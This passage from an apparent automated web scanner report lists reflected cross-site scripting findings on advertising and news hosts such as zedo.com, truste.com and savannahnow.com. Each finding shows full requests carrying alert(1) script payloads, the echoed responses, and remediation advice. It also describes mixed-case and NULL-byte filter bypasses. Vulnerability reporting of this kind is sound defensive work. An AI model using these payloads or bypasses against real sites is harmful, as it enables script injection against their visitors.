GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=b9b1f'%3balert(1)//4f2061d893a&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 614
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:43 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='b9b1f';alert(1)//4f2061d893a,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=b9b1f';alert(1)//4f2061d893a,1a0a560b5ac81252e91
...[SNIP]...

2.30. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38af1"%3balert(1)//1c872f3fc6c was submitted in the q parameter. This input was echoed as 38af1";alert(1)//1c872f3fc6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=38af1"%3balert(1)//1c872f3fc6c&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236:305,235949|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24:0,10#0,24;expires=Wed, 12 Oct 2011 12:48:43 GMT;path=/;domain=.zedo.com;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=141
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:43 GMT
Content-Length: 6518
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='38af1";alert(1)//1c872f3fc6c,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=38af1";alert(1)//1c872f3fc6c,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;


       
...[SNIP]...

2.31. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f095e'%3balert(1)//7fb6e4adbf8 was submitted in the $ parameter. This input was echoed as f095e';alert(1)//7fb6e4adbf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=f095e'%3balert(1)//7fb6e4adbf8&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 478
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:f095e';alert(1)//7fb6e4adbf8,ad769';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,91a0a560b5ee888bf58170a13;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=12:2:1:0:0:0:01a0a560b5991a4ca97d403e3;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:1a0a560b8232ac2cc4a13028;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=79
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='f095e';alert(1)//7fb6e4adbf8,ad769'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=f095e';alert(1)//7fb6e4adbf8,ad769';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311'
...[SNIP]...

2.32. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80c30'%3balert(1)//e63561c611c was submitted in the q parameter. This input was echoed as 80c30';alert(1)//e63561c611c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=80c30'%3balert(1)//e63561c611c&$=&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 528
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560ba8d0f92af69b0c49,5406e';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,91a0a560b5ee888bf58170a13;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=10:2:1:0:0:0:01a0a560b5991a4ca97d403e3;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:1a0a560b8232ac2cc4a13028;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=79
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='80c30';alert(1)//e63561c611c,1a0a560ba8d0f92af69b0c49,5406e'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=80c30';alert(1)//e63561c611c,1a0a560ba8d0f92af69b0c49,5406e';z="+Math.random();}

if(zzuid=
...[SNIP]...

2.33. http://choices.truste.com/ca [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 9d4a0<script>alert(1)</script>dfdd840350b was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=abs01&cid=0811abs728x90&c=abs01cont199d4a0<script>alert(1)</script>dfdd840350b&w=728&h=90 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:38 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 6674
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
ntDivName:"te-clr1-1d4bc8b5-f459-45d2-9d9b-7185b46bfc5d-itl",iconSpanId:"te-clr1-1d4bc8b5-f459-45d2-9d9b-7185b46bfc5d-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"abs01cont199d4a0<script>alert(1)</script>dfdd840350b",noticeBaseUrl:"http://choices-elb.truste.com/camsg?",irBaseUrl:"http://choices-elb.truste.com/cair?",interstitial:te_clr1_1d4bc8b5_f459_45d2_9d9b_7185b46bfc5d_ib,interstitialWidth:728,interstitialHei
...[SNIP]...

2.34. http://choices.truste.com/ca [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 94f4e<ScRiPt>alert(1)</ScRiPt>241f43fb5a was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=abs01&cid=0811abs728x9094f4e<ScRiPt>alert(1)</ScRiPt>241f43fb5a&c=abs01cont19&w=728&h=90 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:36 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 6752
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
<a href="http://preferences.truste.com/preference.html?affiliateId=109&pid=mec01&aid=abs01&cid=0811abs728x9094f4e<ScRiPt>alert(1)</ScRiPt>241f43fb5a&w=728&h=90" target="_blank">
...[SNIP]...

2.35. http://cm.npc-morris.overture.com/js_1_0/ [css_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cm.npc-morris.overture.com
Path:   /js_1_0/

Issue detail

The value of the css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca685"><script>alert(1)</script>7a61d61a441 was submitted in the css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685"><script>alert(1)</script>7a61d61a441&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547 HTTP/1.1
Host: cm.npc-morris.overture.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyMjSyNnCxMAY6dMoAw=

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyNHF2dXM0MAI45Nxww=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Thu, 09-Sep-2021 12:48:46 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4670


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
<link rel="stylesheet" href="http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685"><script>alert(1)</script>7a61d61a441" type="text/css">
...[SNIP]...

2.36. http://dailydeals.savannahnow.com/widgets/300x250 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dailydeals.savannahnow.com
Path:   /widgets/300x250

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9aab3<img%20src%3da%20onerror%3dalert(1)>b54fa5f1680 was submitted in the REST URL parameter 2. This input was echoed as 9aab3<img src=a onerror=alert(1)>b54fa5f1680 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /widgets/300x2509aab3<img%20src%3da%20onerror%3dalert(1)>b54fa5f1680 HTTP/1.1
Host: dailydeals.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.66
Date: Mon, 12 Sep 2011 12:46:15 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Content-Length: 80

Could not find the template: 300x2509aab3<img src=a onerror=alert(1)>b54fa5f1680

2.37. http://go.savannahnow.com/partner_json/search [jsonsp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.savannahnow.com
Path:   /partner_json/search

Issue detail

The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload 5a2f8<script>alert(1)</script>96b82a10b8e was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=10&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.name%2Cvenue.id&where=savannah%2C+ga&radius=&v=&tag=&what=&when=&nbh=&rand_spn=5&st=event&jsonsp=jsp_05a2f8<script>alert(1)</script>96b82a10b8e HTTP/1.1
Host: go.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 12 Sep 2011 12:49:21 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 95
ETag: "dd325e227c05454e7cb9131302f53e61"
Z-DETECTED-FLAVOR: go_flavor |
X-Content-Digest: 40ceae8c13c9e185408d91ae53049dba4bf265fc
Z-REQUEST-HANDLED-BY: www16
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 2882

jsp_05a2f8<script>alert(1)</script>96b82a10b8e('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Darius Rucker","has_tickets":true,"tickets_on_sale":null,"venue_id":854691,"id":172970805,"starttime":"Fri Sep 16 19:00:00 UTC 2011","zurl
...[SNIP]...

2.38. http://go.savannahnow.com/partner_json/search [limit parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.savannahnow.com
Path:   /partner_json/search

Issue detail

The value of the limit request parameter is copied into the HTML document as plain text between tags. The payload %007c843<script>alert(1)</script>4e254564077 was submitted in the limit parameter. This input was echoed as 7c843<script>alert(1)</script>4e254564077 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=10%007c843<script>alert(1)</script>4e254564077&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.name%2Cvenue.id&where=savannah%2C+ga&radius=&v=&tag=&what=&when=&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: go.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 12 Sep 2011 12:49:18 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 178
ETag: "2865bab473716d7743b16d03277163cf"
Z-DETECTED-FLAVOR: go_flavor |
X-Content-Digest: 20dedd0ce3207e873334ffc6054c1ecef3c12fd0
Z-REQUEST-HANDLED-BY: www11
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 2883

jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Darius Rucker","has_tickets":true,"tickets_on_sale":null,"venue_id":854691,"id":172970805,"starttime":"Fri Sep 16 19:00:00 UTC 2011"
...[SNIP]...
e":-81.0965,"state":"GA"},"sort":0,"offset":0,"when":"","what":"","catex":null,"limit":10,"sst":1315785600},"next_page":true,"identifier": "st=event,event_spn&where=savannah%2Cga&ssi=0&ssrss=1&srss=10.7c843<script>alert(1)</script>4e254564077"}}})')

2.39. http://go.savannahnow.com/partner_json/search [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.savannahnow.com
Path:   /partner_json/search

Issue detail

